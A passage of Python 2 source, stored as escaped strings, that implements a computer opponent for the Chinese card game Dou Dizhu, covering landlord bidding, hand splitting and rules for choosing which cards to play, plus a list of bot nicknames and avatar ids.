keys = self.__data.keys()\r\n", " keys.sort()\r\n", " return keys\r\n", "\r\n", " def getFirstVal(self):\r\n", " keys = self.getKeys()\r\n", " if len(keys) > 0:\r\n", " return self.get(keys[0])\r\n", " return None\r\n", "\r\n", " def getLasttVal(self):\r\n", " keys = self.getKeys()\r\n", " if len(keys) > 0:\r\n", " return self.get(keys[len(keys)-1])\r\n", " return None\r\n", "\r\n", " def getGreaterThan(self, k):\r\n", " \"\"\"取出大于k的牌->obj或[]\"\"\"\r\n", " keys = self.getKeys()\r\n", " for key in keys:\r\n", " if key > k:\r\n", " return self.get(key)\r\n", " return []\r\n", " \r\n", " def getMaxGreaterThan(self, k):\r\n", " \"\"\"取出大于k的最大的牌->obj或[]\"\"\"\r\n", " keys = self.getKeys()\r\n", " for i in range(len(keys)-1, -1,-1):\r\n", " key = keys[i]\r\n", " if key > k:\r\n", " return self.get(key)\r\n", " return []\r\n", "\r\n", " def getList(self):\r\n", " list = []\r\n", " keys = self.getKeys()\r\n", " for key in keys:\r\n", " val = self.get(key)\r\n", " if type(val) == types.ListType:\r\n", " for t in val:\r\n", " list.append(t)\r\n", " else:\r\n", " list.append(val)\r\n", " return list\r\n", " \r\n", " def getIndexVal(self, index):\r\n", " keys = self.getKeys()\r\n", " if len(keys) > index:\r\n", " return self.get(keys[index])\r\n", " return None\r\n", "\r\n", "class AIConfig():\r\n", " @staticmethod\r\n", " def getConfig(name):\r\n", " return AIConfig.__config[name]\r\n", " \r\n", " __config = {\r\n", " \"nickName\": ['雪舞№枫红','夜舞&倾城','魅影い冰绝','残恋々ら','匰身ァ饚З','走鐹菂蕗_','无语づ肴','传じ☆ve说','恋☆鵷:鶵','≮梦★羽≯','莞镁主题曲〃','o┢┦apΡy','幽魂邀絮】','So丶滚吧','無話可說。','花╮开一夏','▋潶禮菔▍','倾世恋流年','訫侑所属丶','命里缺沵','柔情似水似','淫大代表','钢茎混凝凸','∫安雅轩 *','查 无 此 人','上帝是个妞','_她入他心','___髅ㄦ〤','三分淑女范','﹋落花伊人','吃货不痴货','〃逢床作戏╮','屌丝先森 ぃ','资格让皒哭','╰︶情兽〤','得瑟的尛孩纸','好小伙中国造','情非得已り','夏兮兮°','等着你来宠','安小夕 ▽','堇色流年丿','如歌亦如梦','墨染锦年╮','独自沉沦 ∞','乱世°妖娆','夏沫"Smile','七分笑三分真','沫尐诺⌒_⌒','___大苹果','德玛→西亚','Oo草丛伦oO','菊★花№信','_提莫必须死','嘉文四阿哥_','轮子┱妈','稻__草人','乌┣┰┝鸦','┣死歌┰┝','爱~。~射','炮-,-娘','oO小萝莉','狗头人Oo','大々‖嘴','大虫子','扇子Oo妈','冰鸟','船长','女剑','女枪','男枪','风女','卡萨丁','阿卡丽','卡特琳娜','伊泽瑞尔','戴安娜','安妮','凯特琳','贾克斯','卡萨丁','拉克丝','易大师','莫甘娜','奈德丽','索拉卡','提莫','潘森','泰达米尔','佛拉基米尔','崔斯塔娜','(=@__@=)哪里','丽桑桌','奎因','扎克','维嘉','墨菲特','索菲娅','阿狸','影流之主'],\r\n", " \"head\": ['head_1001','head_1002','head_1003','head_1004','head_1005','head_1006','head_1007','head_1008','head_1009','head_1010','head_1011','head_1012','head_1013','head_1014','head_1015','head_1016','head_1017','head_1018','head_1019','head_1020']\r\n", " }\r\n", "\r\n", "class CardAILogic():\r\n", " \"\"\"斗地主AI逻辑\"\"\"\r\n", " def __init__(self, roomId, tableId, positionId):\r\n", " self.__table = None\r\n", " self.__pos = None\r\n", " self.__nextPos = None\r\n", " self.__prePos = None\r\n", " self.__playerNum = 3\r\n", " self.__Landlord = None\r\n", " self.__CK = 13\r\n", " self.__CA = 14\r\n", " self.__C2 = 15#2子\r\n", " self.__CW1 = 18\r\n", " self.__CW2 = 19\r\n", " self.__role = 0#处于地主的位置\r\n", " self.__largestCardSize = self.__CW2\r\n", "\r\n", " roomStruct = MemoryCacheStruct[RoomData]()\r\n", " key = str(roomId)\r\n", " roomData = None\r\n", " result = roomStruct.TryGet(key)\r\n", " if result[0]:\r\n", " roomData = result[1]\r\n", " resultTable = roomData.Tables.TryGetValue(tableId)\r\n", " if resultTable[0]:\r\n", " self.__table = resultTable[1]\r\n", " self.__playerNum = self.__table.PlayerNum\r\n", "\r\n", " if self.__table and positionId < self.__table.Positions.Length:\r\n", " tempCard = 0\r\n", " for pos in self.__table.Positions:\r\n", " if pos.IsLandlord:\r\n", " self.__Landlord = pos\r\n", " if pos.Id == positionId:\r\n", " self.__pos = pos\r\n", " #计算最大牌\r\n", " if pos.CardData and pos.CardData.Count > 0:\r\n", " lastCardVal = pos.CardData[pos.CardData.Count-1] % 100\r\n", " if lastCardVal > tempCard:\r\n", " tempCard = lastCardVal\r\n", " if tempCard > 0:\r\n", " self.__largestCardSize = tempCard\r\n", "\r\n", " if self.__Landlord and self.__pos:\r\n", " index = (self.__pos.Id + 1) % self.__playerNum \r\n", " self.__nextPos = self.__table.Positions[index]\r\n", " preindex = (self.__pos.Id + self.__playerNum - 1) % self.__playerNum \r\n", " self.__prePos = self.__table.Positions[preindex]\r\n", " #计算role处在0:地主,-1:上家,1:下家位置\r\n", " if self.__Landlord.Id == self.__pos.Id:\r\n", " self.__role = 0\r\n", " elif self.__Landlord.Id == self.__nextPos.Id:\r\n", " self.__role = -1\r\n", " else:\r\n", " self.__role = 1\r\n", "\r\n", " def writeLog(self, msg):\r\n", " #todo test\r\n", " TraceLog.WriteComplement(msg)\r\n", "\r\n", " def getCardSize(self, card):\r\n", " \"\"\"获取牌大小->int\"\"\"\r\n", " return card % 100\r\n", "\r\n", " def getOutCardData(self):\r\n", " \"\"\"出牌对象->CardData\"\"\"\r\n", " return self.__table.PreCardData\r\n", " \r\n", " def getOutCardResult(self):\r\n", " \"\"\"获取已出牌记录->List<CardData>\"\"\"\r\n", " return self.__table.OutCardList\r\n", "\r\n", " def getUserCard(self):\r\n", " \"\"\"获取玩家手上的牌->List<int>\"\"\"\r\n", " return self.__pos.CardData\r\n", "\r\n", " def getUserRole(self):\r\n", " \"\"\"玩家角色,0:地主,-1:上家,1:下家位置\"\"\"\r\n", " return self.__role\r\n", " \r\n", " def getNextPosCardCount(self):\r\n", " \"\"\"获取玩家下家牌数->int\"\"\"\r\n", " return self.__nextPos.CardData.Count\r\n", " \r\n", " def getPrePosCardCount(self):\r\n", " \"\"\"获取玩家上家牌数->int\"\"\"\r\n", " return self.__prePos.CardData.Count\r\n", "\r\n", " def checkCall(self):\r\n", " \"\"\"检查能否叫地主->bool\"\"\"\r\n", " #火箭为8分,炸弹为6分,大王4分,小王3分,一个2为2分\r\n", " bigCardValue = 0#大牌权值\r\n", " cards = self.getUserCard()\r\n", " times = self.__table.MultipleNum / 2\r\n", " bomCards = []\r\n", " bombvct = CardVector('bomb')\r\n", " self.getBombCard(cards, bombvct)\r\n", " bomCards.append(bombvct.getList())\r\n", " wangvct = CardVector('wang')\r\n", " self.getWangBombCard(cards, wangvct)\r\n", " bomCards.append(wangvct.getList())\r\n", " c2 = CardVector('c2')\r\n", " self.getCard(cards, self.__C2, c2)\r\n", " c2Count = len(c2.getList())\r\n", "\r\n", " for bom in bomCards:\r\n", " if len(bom) == 4:\r\n", " bigCardValue = bigCardValue + 6\r\n", " elif len(bom) == 2:\r\n", " bigCardValue = bigCardValue + 8\r\n", " if len(bomCards) == 0:\r\n", " if wangvct.hasKey(self.__CW2):\r\n", " bigCardValue = bigCardValue + 4\r\n", " if wangvct.hasKey(self.__CW1):\r\n", " bigCardValue = bigCardValue + 3\r\n", " if c2Count < 4:\r\n", " bigCardValue = bigCardValue +(c2Count * 2)\r\n", " if(bigCardValue >= 7 and times < 3)\\\r\n", " or (bigCardValue >= 5 and times < 2)\\\r\n", " or (bigCardValue >= 2 and times < 1):\r\n", " return True\r\n", " return False\r\n", "\r\n", " def searchOutCard(self):\r\n", " \"\"\"出牌搜索,牌组0:为空,1:单牌,2:对牌,3:王炸,4:三张,5:三带一,6:三带二,7:炸弹,8:顺子,9:四带二,10:连对,11:飞机,12:飞机带二,13:二连飞机带二对\"\"\"\r\n", " resultCards = []\r\n", " handCard = self.getUserCard()\r\n", " if not handCard or len(handCard) == 0:\r\n", " return resultCards\r\n", " myCardCount = len(handCard)\r\n", " handleTimes = self.getCardHandleTimes(handCard)\r\n", " preOutCard = self.getOutCardData()#当前已的出牌\r\n", " outCardResult = self.getOutCardResult()\r\n", " role = self.getUserRole()\r\n", " nextPosCardCount = self.getNextPosCardCount()\r\n", " prePosCardCount = self.getPrePosCardCount()\r\n", " nextIsLand = self.__nextPos.IsLandlord\r\n", " landlord = self.__Landlord\r\n", " landlordCardCount = self.__prePos.CardData.Count\r\n", "\r\n", " if not preOutCard or preOutCard.PosId == self.__pos.Id:\r\n", " #任意出牌\r\n", " outVct = CardVector('')\r\n", " resultCards = self.freeOutCard(handCard)\r\n", " cardCount = len(resultCards)\r\n", " if (role==0 and (nextPosCardCount == 1 or prePosCardCount ==1) and cardCount==1)\\\r\n", " or (role!=0 and nextIsLand and nextPosCardCount == 1 and cardCount==1)\\\r\n", " or (role!=0 and landlord.CardData.Count == 1 and cardCount==1):\r\n", " #不能出比最大牌小的单牌\r\n", " resultCards = []\r\n", " self.getTwoCard(handCard, outVct)\r\n", " if outVct.len() > 0:\r\n", " self.copyList(outVct.getFirstVal(), resultCards)\r\n", " else:\r\n", " #最大单牌\r\n", " cards = self.getLargeSingleCard(handCard, self.__CA)\r\n", " if len(cards) > 0:\r\n", " self.copyList(cards, resultCards)\r\n", " else:\r\n", " self.copyList(handCard[len(handCard)-1], resultCards)\r\n", "\r\n", " elif (role==0 and (nextPosCardCount == 2 or prePosCardCount ==2) and cardCount==2 and myCardCount > 2)\\\r\n", " or (role!=0 and nextIsLand and nextPosCardCount == 2 and cardCount==2 and myCardCount > 2)\\\r\n", " or (role!=0 and landlord.CardData.Count == 2 and cardCount==2 and myCardCount > 2):\r\n", " #不能出小于最大牌的对子\r\n", " cardval = self.getCardSize(resultCards[0])\r\n", " if cardval < self.__CA and cardval < self.__largestCardSize:\r\n", " resultCards = []\r\n", " bombvct = CardVector('')\r\n", " lastCards = self.getBombCard(handCard, bombvct)\r\n", " if myCardCount < 6 and bombvct.len() > 0:\r\n", " self.copyList(bombvct.getFirstVal(), resultCards)\r\n", " self.getSingleCard(lastCards, outVct)\r\n", " if outVct.len() > 0:\r\n", " self.copyList(outVct.getFirstVal(), resultCards)\r\n", " else:\r\n", " resultCards.append(handCard[0])\r\n", " elif role!=0 and nextIsLand==False and handleTimes > 3 and nextPosCardCount == 1:\r\n", " #自己手上大于6张,且同家剩1张时出单牌\r\n", " resultCards = []\r\n", " resultCards.append(handCard[0])\r\n", " elif role!=0 and nextIsLand==False and handleTimes > 3 and nextPosCardCount == 2 and self.__pos.OutTwoTimes == 0:\r\n", " #自己手上大于6张,且同家剩2张配合对家出对次数为0时出对子\r\n", " self.getTwoCard(handCard, outVct)\r\n", " if outVct.len() > 0:\r\n", " resultCards = []\r\n", " self.__pos.OutTwoTimes = self.__pos.OutTwoTimes + 1\r\n", " self.copyList(outVct.getFirstVal(), resultCards)\r\n", " else:\r\n", " pass\r\n", " #self.writeLog('%s:%s' % ('任意出牌' ,resultCards))\r\n", "\r\n", " elif preOutCard.Type == 3:\r\n", " #王炸\r\n", " return resultCards\r\n", " else:\r\n", " outcardType = preOutCard.Type\r\n", " islandlordOut = preOutCard.PosId == landlord.Id\r\n", " if role == 0:\r\n", " #地主压牌\r\n", " if handleTimes < 3 or (nextPosCardCount == 2 and outcardType == DeckType.Double)\\\r\n", " or (nextPosCardCount == 1 and outcardType == DeckType.Single):\r\n", " #压牌\r\n", " resultCards = self.enforceOutCard(preOutCard, handCard)\r\n", " elif nextPosCardCount < 7 or prePosCardCount < 7:\r\n", " #压牌不打炸\r\n", " resultCards = self.enforceOutCard(preOutCard, handCard, True)\r\n", " else:\r\n", " #跟牌\r\n", " resultCards = self.followOutCard(preOutCard, handCard)\r\n", " elif role < 0:\r\n", " #地主上家出牌\r\n", " #a)当自己只差2手时压牌,或者地主小于3张且出对时压牌;或者地主小于6张并且打单或对且对家不是最大牌时压牌\r\n", " #b)农民同家出牌大于等于A时不跟\r\n", " if handleTimes < 3 or\\\r\n", " (landlordCardCount <= 2 and outcardType == DeckType.Double and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)) or\\\r\n", " (landlordCardCount == 1 and outcardType == DeckType.Single and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)) or\\\r\n", " landlordCardCount <= 2:\r\n", " #压牌\r\n", " resultCards = self.enforceOutCard(preOutCard, handCard)\r\n", " elif (landlordCardCount < 7 and islandlordOut and (outcardType == DeckType.Double or outcardType == DeckType.Single) ):\r\n", " #压牌不打炸\r\n", " resultCards = self.enforceOutCard(preOutCard, handCard, True)\r\n", " else:\r\n", " if (not islandlordOut) and (preOutCard.CardSize >= self.__CA \\\r\n", " or (outcardType >= DeckType.Double and preOutCard.CardSize >= self.__CK)\\\r\n", " or outcardType == DeckType.Single and preOutCard.CardSize > self.__C2):\r\n", " #不跟\r\n", " return resultCards\r\n", " #跟牌\r\n", " resultCards = self.followOutCard(preOutCard, handCard)\r\n", " else:\r\n", " #地主下家出牌,当地主小于3张\r\n", " if handleTimes < 3 or (islandlordOut and landlordCardCount <= 2):\r\n", " #压牌\r\n", " resultCards = self.enforceOutCard(preOutCard, handCard)\r\n", " elif (landlordCardCount <= 2 and outcardType == DeckType.Double and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)) or\\\r\n", " (landlordCardCount == 1 and outcardType == DeckType.Single and (islandlordOut or preOutCard.CardSize < self.__largestCardSize)):\r\n", " #压牌不打炸\r\n", " resultCards = self.enforceOutCard(preOutCard, handCard, True)\r\n", " else:\r\n", " if (not islandlordOut) and (preOutCard.CardSize >= self.__CA \\\r\n", " or (outcardType >= DeckType.Double and preOutCard.CardSize >= self.__CK)\\\r\n", " or outcardType == DeckType.Single and preOutCard.CardSize > self.__C2):\r\n", " #不跟\r\n", " return resultCards\r\n", " #跟牌\r\n", " resultCards = self.followOutCard(preOutCard, handCard)\r\n", "\r\n", " return resultCards\r\n", " \r\n", " def copyList(self, list, clist, index=0, count=0):\r\n", " \"\"\"@list: copy源,\\n@clist: copy目标\\@index:开始位置\\n@count:数量\"\"\"\r\n", " if type(list) == types.ListType:\r\n", " i = 0\r\n", " for val in list:\r\n", " if count > 0 and len(clist) == count:\r\n", " break\r\n", " if i >= index:\r\n", " clist.append(val)\r\n", " i = i+1\r\n", " elif list:\r\n", " clist.append(list)\r\n", "\r\n", " def getLargeSingleCard(self, handCard, minval):\r\n", " \"\"\"单牌倒打->[]\"\"\"\r\n", " result = []\r\n", " #先打2\r\n", " verctor = CardVector('')\r\n", " handTime = self.getCardHandleTimes(handCard)\r\n", " self.getCard(handCard, self.__C2, verctor)\r\n", " if handTime > 3 and verctor.len() > 0 and minval < self.__C2:\r\n", " result.append(verctor.getFirstVal())\r\n", " else:\r\n", " verctor = CardVector('')\r\n", " wangvct = CardVector('')\r\n", " bombvct = CardVector('')\r\n", " #排除炸\r\n", " lastCards = self.getBombCard(handCard, bombvct)\r\n", " lastCards = self.getWangBombCard(lastCards, wangvct)\r\n", " self.convertVerctor(lastCards, verctor)\r\n", " if verctor.len() > 0:\r\n", " tempCard = verctor.getMaxGreaterThan(minval)\r\n", " if tempCard:\r\n", " self.copyList(tempCard, result)\r\n", " return result\r\n", " #self.copyList(bombvct.getFirstVal(), result)\r\n", " #if len(result) == 0:\r\n", " # self.copyList(wangvct.getList(), result)\r\n", " return result\r\n", " \r\n", " def freeOutCard(self, handCard):\r\n", " \"\"\"自由出牌,先飞机,连对,顺子,三张,对子,单牌->[]\"\"\"\r\n", " vector = self.splitCard(handCard)\r\n", " val = 0\r\n", " resultCards = []\r\n", " #判断剩余2手牌时是否是有炸或王炸\r\n", " handTimes = self.getVectorHandleTimes(vector)\r\n", " if handTimes < 3:\r\n", " #王炸\r\n", " resultCards = self.outWangBombCard(handCard)\r\n", " if len(resultCards) == 0:\r\n", " #取炸\r\n", " resultCards = self.outBombCard(handCard)\r\n", " if len(resultCards) == 0:\r\n", " #先出最大的对或单\r\n", " vectorMax = CardVector('Max')\r\n", " self.getCard(handCard, self.__largestCardSize, vectorMax)\r\n", " if vectorMax.len() > 0:\r\n", " if vector.get('two').hasKey(self.__largestCardSize):\r\n", " self.copyList(vector.get('two').get(self.__largestCardSize), resultCards)\r\n", " if len(resultCards) == 0 and vector.get('one').hasKey(self.__largestCardSize):\r\n", " self.copyList(vector.get('one').get(self.__largestCardSize), resultCards)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", "\r\n", " resultCards = self.processOutCard(vector, DeckType.FlyAndTwo, val, 8)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " resultCards = self.processOutCard(vector, DeckType.FlyAndTwoDouble, val, 10)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " resultCards = self.processOutCard(vector, DeckType.Fly, val, 6)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " resultCards = self.processOutCard(vector, DeckType.Liandui, val, 6)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " resultCards = self.processOutCard(vector, DeckType.Shunzi, val, 5)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " #三张是A以上的牌时,先出其它类型牌\r\n", " c2Cards = []\r\n", " resultCards = self.processOutCard(vector, DeckType.ThreeAndOne, val, 3)\r\n", " if len(resultCards) > 0:\r\n", " if handTimes > 2 and self.getCardSize(resultCards[0]) >= self.__CA:\r\n", " c2Cards = resultCards\r\n", " resultCards = []\r\n", " else:\r\n", " return resultCards\r\n", " if len(c2Cards) == 0:\r\n", " resultCards = self.processOutCard(vector, DeckType.ThreeAndTwo, val, 3)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " resultCards = self.processOutCard(vector, DeckType.Three, val, 3)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " resultCards = []\r\n", " #只差一对\r\n", " if len(handCard) == 2:\r\n", " resultCards = self.processOutCard(vector, DeckType.Double, val, 2)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", " #是否有四带2\r\n", " bombCards = self.processOutCard(vector, DeckType.Bomb, val, 4)\r\n", " if handTimes < 5 and len(bombCards) > 0:\r\n", " resultCards = []\r\n", " self.copyList(bombCards, resultCards)\r\n", " oneCount = self.getSingleCount(vector)\r\n", " twoCount = self.getTwoCount(vector)\r\n", " if oneCount > 1:\r\n", " self.copyList(vector.get('one').getIndexVal(0), resultCards)\r\n", " self.copyList(vector.get('one').getIndexVal(1), resultCards)\r\n", " return resultCards\r\n", " elif twoCount == 1 and oneCount ==1:\r\n", " onetemp = vector.get('one').getFirstVal()\r\n", " twotemp = vector.get('two').getFirstVal()\r\n", " if self.getCardSize(onetemp) > self.getCardSize(twotemp[0]):\r\n", " self.copyList(twotemp, resultCards)\r\n", " return resultCards\r\n", " else:\r\n", " self.copyList(onetemp, resultCards)\r\n", " self.copyList(twotemp[0], resultCards)\r\n", " return resultCards\r\n", "\r\n", " elif twoCount > 0:\r\n", " self.copyList(vector.get('two').getList(), resultCards)\r\n", " return resultCards\r\n", " else:\r\n", " resultCards = []\r\n", "\r\n", " #是否出对或单\r\n", " singleCards = self.processOutCard(vector, DeckType.Single, val, 1)\r\n", " twoCards = self.processOutCard(vector, DeckType.Double, val, 2)\r\n", " if len(twoCards) > 0 and len(singleCards) > 0\\\r\n", " and self.getCardSize(singleCards[0]) > self.getCardSize(twoCards[0]):\r\n", " return twoCards\r\n", " elif len(singleCards) > 0:\r\n", " return singleCards\r\n", " elif len(twoCards) > 0:\r\n", " return twoCards\r\n", "\r\n", " resultCards = self.processOutCard(vector, DeckType.Bomb, val, 4)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", "\r\n", " if len(c2Cards) == 0:\r\n", " resultCards = c2Cards\r\n", " return resultCards\r\n", "\r\n", " def followOutCard(self, preOutCard, handCard):\r\n", " \"\"\"跟对方的出牌,不出对2或3张2->[]\"\"\"\r\n", " type = preOutCard.Type\r\n", " val = preOutCard.CardSize\r\n", " count = preOutCard.Cards.Length\r\n", " vector = self.splitCard(handCard)\r\n", " resultCards = self.processOutCard(vector, type, val, count, 0)\r\n", " if len(resultCards) > 1:\r\n", " if type != DeckType.Single\\\r\n", " and self.getCardSize(resultCards[0]) == self.__C2:\r\n", " resultCards = []#不出\r\n", " return resultCards\r\n", " \r\n", " def processOutCard(self, vector, type, minval, mincount, maxcount=20):\r\n", " \"\"\"处理牌组出牌规则->[]\\n@vector:vector对象集合,@type:出牌类型,\\n@minval:,\\n@mincount:,\\n@maxcount:为0时压牌,否则任意出\"\"\"\r\n", " resultCards = []\r\n", " cards = []\r\n", " if type == DeckType.Single:\r\n", " cards = self.getMoreThanCardVal(vector.get('one'), minval, mincount)\r\n", " if len(cards) > 0:\r\n", " resultCards.append(cards[0])\r\n", " elif type == DeckType.Double:\r\n", " cards = self.getMoreThanCardVal(vector.get('two'), minval, mincount/2)\r\n", " if len(cards) > 0:\r\n", " self.copyList(cards, resultCards)\r\n", " elif type == DeckType.WangBomb:\r\n", " return resultCards\r\n", " elif type == DeckType.Three:\r\n", " cards = self.getMoreThanCardVal(vector.get('three'), minval, mincount/3)\r\n", " if len(cards) > 0:\r\n", " self.copyList(cards, resultCards)\r\n", " elif type == DeckType.ThreeAndOne:\r\n", " cards = self.getMoreThanCardVal(vector.get('three'), minval, mincount/3)\r\n", " onevct = vector.get('one')\r\n", " if len(cards) > 0 and onevct.len() > 0:\r\n", " self.copyList(cards, resultCards)\r\n", " resultCards.append(onevct.getFirstVal())\r\n", " elif type == DeckType.ThreeAndTwo:\r\n", " cards = self.getMoreThanCardVal(vector.get('three'), minval, mincount/3)\r\n", " twovct = vector.get('two')\r\n", " if len(cards) > 0 and twovct.len() > 0:\r\n", " self.copyList(cards, resultCards)\r\n", " self.copyList(twovct.getFirstVal(), resultCards)\r\n", " elif type == DeckType.Bomb:\r\n", " cards = self.getMoreThanCardVal(vector.get('bomb'), minval, mincount/4)\r\n", " if len(cards) > 0:\r\n", " self.copyList(cards, resultCards)\r\n", " elif type == DeckType.Shunzi:\r\n", " shunvct = vector.get('shun')\r\n", " keys = shunvct.getKeys()\r\n", " for key in keys:\r\n", " cards = shunvct.get(key)\r\n", " resultCards = self.getMoreThanShunCard(cards, minval, mincount, maxcount)\r\n", " if len(resultCards) > 0:\r\n", " break\r\n", " elif type == DeckType.FourAndTwo:\r\n", " cards = self.getMoreThanCardVal(vector.get('bomb'), minval, mincount/4)\r\n", " onevct = vector.get('one')\r\n", " twovct = vector.get('two')\r\n", " if len(cards) > 0 and (onevct.len() > 1 or twovct.len() > 0):\r\n", " self.copyList(cards, resultCards)\r\n", " if onevct.len() > 1:\r\n", " self.copyList(onevct.getIndexVal(0), resultCards)\r\n", " self.copyList(onevct.getIndexVal(1), resultCards)\r\n", " else:\r\n", " for i in range(0,2):\r\n", " self.copyList(twovct.getIndexVal(i), resultCards)\r\n", " elif type == DeckType.Liandui:\r\n", " twovct = vector.get('two')\r\n", " resultCards = self.getMoreThanCardVal(twovct, minval, mincount/2, maxcount)\r\n", " elif type == DeckType.Fly\\\r\n", " or type == DeckType.FlyAndTwo\\\r\n", " or type == DeckType.FlyAndTwoDouble:\r\n", " #处理飞机\r\n", " threevct = vector.get('three')\r\n", " if threevct.len() > 1:\r\n", " mcount = 0\r\n", " attrVector = None\r\n", " if type == DeckType.FlyAndTwo:\r\n", " attrVector = vector.get('one')\r\n", " mcount = mincount / (3+1)\r\n", " elif type == DeckType.FlyAndTwoDouble:\r\n", " attrVector = vector.get('two')\r\n", " mcount = mincount / (3+2)\r\n", " else:\r\n", " mcount = mincount / 3\r\n", "\r\n", " if mcount > 1:\r\n", " threeCards = self.getMoreThanCardVal(threevct, minval, mcount, maxcount)\r\n", " if len(threeCards) > 0 and attrVector and attrVector.len() >= mcount:\r\n", " attrcount = 0\r\n", " tempArr = []\r\n", " attrkeys = attrVector.getKeys()\r\n", " for key in attrkeys:\r\n", " if attrcount == mcount:\r\n", " break\r\n", " self.copyList(attrVector.get(key),tempArr)\r\n", " attrcount = attrcount + 1\r\n", " if (maxcount==0 and attrcount == mcount) or ((maxcount>0 and attrcount >= mcount)):\r\n", " self.copyList(threeCards, resultCards)\r\n", " self.copyList(tempArr, resultCards)\r\n", " else:\r\n", " pass\r\n", " return resultCards\r\n", " \r\n", " def enforceOutCard(self, preOutCard, handCard, ignoreBomb=False):\r\n", " \"\"\"压对方的牌->list\\n@ignoreBomb:是否排除炸\"\"\"\r\n", " resultCards = []\r\n", " type = preOutCard.Type\r\n", " minval = preOutCard.CardSize\r\n", " cardCount = preOutCard.Cards.Length\r\n", " return self.processEnforceOutCard(handCard, type, minval, cardCount, ignoreBomb)\r\n", "\r\n", " def processEnforceOutCard(self, handCard, type, minval, cardCount, ignoreBomb):\r\n", " \"\"\"处理压对方的牌->list\"\"\"\r\n", " resultCards = []\r\n", " vector = CardVector('')\r\n", "\r\n", " #判断剩余牌是否是炸或王炸\r\n", " handTimes = self.getCardHandleTimes(handCard)\r\n", " if handTimes < 3:\r\n", " #取炸\r\n", " resultCards = self.outBombCard(handCard)\r\n", " if len(resultCards) == 0:\r\n", " #王炸\r\n", " resultCards = self.outWangBombCard(handCard)\r\n", " if len(resultCards) > 0:\r\n", " return resultCards\r\n", "\r\n", " if type == DeckType.Single:\r\n", " #最大单牌\r\n", " self.copyList(self.getLargeSingleCard(handCard, minval),resultCards)\r\n", " elif type == DeckType.Double:\r\n", " self.getTwoCard(handCard, vector)\r\n", " if vector.len()>0:\r\n", " self.copyList(vector.getGreaterThan(minval),resultCards)\r\n", " else:\r\n", " self.getTwoCard(handCard, vector, True)\r\n", " if vector.len()>0:\r\n", " self.copyList(vector.getGreaterThan(minval),resultCards)\r\n", " elif type == DeckType.WangBomb:\r\n", " return resultCards\r\n", " elif type == DeckType.Three:\r\n", " self.getThreeCard(handCard, vector)\r\n", " if vector.len()>0:\r\n", " self.copyList(vector.getGreaterThan(minval),resultCards)\r\n", " elif type == DeckType.ThreeAndOne:\r\n", " lessCards = self.getThreeCard(handCard, vector)\r\n", " if vector.len()>0:\r\n", " vct = CardVector('')\r\n", " self.getSingleCard(lessCards, vct)\r\n", " threearr = vector.getGreaterThan(minval)\r\n", " if vct.len() > 0 and threearr and len(threearr) > 0:\r\n", " self.copyList(threearr, resultCards)\r\n", " resultCards.append(vct.getFirstVal())\r\n", " elif type == DeckType.ThreeAndTwo:\r\n", " lessCards = self.getThreeCard(handCard, vector)\r\n", " if vector.len()>0:\r\n", " vct = CardVector('')\r\n", " self.getTwoCard(lessCards, vct)\r\n", " threearr = vector.getGreaterThan(minval)\r\n", " if vct.len() > 0 and threearr and len(threearr) > 0:\r\n", " self.copyList(threearr,resultCards)\r\n", " self.copyList(vct.getFirstVal(),resultCards)\r\n", " elif type == DeckType.Bomb:\r\n", " pass\r\n", " elif type == DeckType.Shunzi:\r\n", " lessCards = self.getShunCard(handCard, vector)\r\n", " if vector.len()>0:\r\n", " resultCards = self.getMoreThanShunCard(vector.getFirstVal(), minval, cardCount)\r\n", " elif type == DeckType.FourAndTwo:\r\n", " lessCards = self.getBombCard(handCard, vector)\r\n", " tempcard = vector.getGreaterThan(minval)\r\n", " if tempcard:\r\n", " onevct = CardVector('')\r\n", " twovct = CardVector('')\r\n", " lessCards = self.getSingleCard(lessCards, onevct)\r\n", " lessCards = self.getTwoCard(lessCards, twovct)\r\n", " if (onevct.len() > 1 or twovct.len() > 0):\r\n", " self.copyList(tempcard, resultCards)\r\n", " if onevct.len() > 1:\r\n", " self.copyList(onevct.getIndexVal(0), resultCards)\r\n", " self.copyList(onevct.getIndexVal(1), resultCards)\r\n", " else:\r\n", " for i in range(0,2):\r\n", " self.copyList(twovct.getIndexVal(i), resultCards)\r\n", " elif type == DeckType.Liandui:\r\n", " self.getTwoCard(handCard, vector)\r\n", " cnum = cardCount / 2\r\n", " if vector.len() >= cnum:\r\n", " resultCards = self.getMoreThanCardVal(vector, minval, cnum)\r\n", " pass\r\n", " elif type == DeckType.Fly\\\r\n", " or type == DeckType.FlyAndTwo\\\r\n", " or type == DeckType.FlyAndTwoDouble:\r\n", " #处理飞机\r\n", " lessCards = self.getThreeCard(handCard, vector)\r\n", " threevct = vector\r\n", " if threevct.len() > 1:\r\n", " mcount = 0\r\n", " attrVector = None\r\n", " if type == DeckType.FlyAndTwo:\r\n", " attrVector = CardVector('')\r\n", " self.getSingleCard(lessCards, attrVector)\r\n", " mcount = mincount / (3+1)\r\n", " elif type == DeckType.FlyAndTwoDouble:\r\n", " attrVector = CardVector('')\r\n", " self.getTwoCard(lessCards, attrVector)\r\n", " mcount = mincount / (3+2)\r\n", " else:\r\n", " mcount = mincount / 3\r\n", "\r\n", " if mcount > 1:\r\n", " threeCards = self.getMoreThanCardVal(threevct, minval, mcount, maxcount)\r\n", " if len(threeCards) > 0 and attrVector and attrVector.len() >= mcount:\r\n", " attrcount = 0\r\n", " tempArr = []\r\n", " attrkeys = attrVector.getKeys()\r\n", " for key in attrkeys:\r\n", " if attrcount == mcount:\r\n", " break\r\n", " self.copyList(attrVector.get(key),tempArr)\r\n", " attrcount = attrcount + 1\r\n", " if (maxcount==0 and attrcount == mcount) or ((maxcount>0 and attrcount >= mcount)):\r\n", " self.copyList(threeCards, resultCards)\r\n", " self.copyList(tempArr, resultCards)\r\n", " else:\r\n", " pass\r\n", "\r\n", " if ignoreBomb:\r\n", " if len(resultCards) == 0:\r\n", " #取炸\r\n", " resultCards = 